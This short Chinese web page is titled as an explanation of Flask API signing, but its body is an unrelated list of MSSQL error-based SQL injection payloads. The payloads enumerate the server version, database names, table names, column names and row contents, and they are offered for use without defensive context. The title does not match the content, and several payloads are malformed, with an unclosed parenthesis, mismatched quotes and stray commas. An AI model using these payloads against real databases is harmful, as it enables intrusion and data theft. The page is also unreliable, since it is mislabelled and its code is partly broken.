Flask接口签名sign原理与实例代码浅析
261
2022-10-24
显性注入代码
库版本进行查询 and 1=(select @@version)
查看当前库名 and 1=(select db_name()
库名查询 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <> '第一个数据库库名',name <> '第二个数据库库名',。。。。。。name <> '第N个数据库库名’)
表名查询: and 1=(select top 1 name from sysobjects where xtype='u’ and name <> '第一个数据库表名'name <> '第二个数据库表名',。。。。。。name <> '第N个数据库表名’)
列名查询 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='表名') and name <> '第一个列名’,and name <> '第二个列名'。。。。。。and name <> '第个列名' )
内容查询: and 1=(select top 1 列名 from 表名)
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
评论列表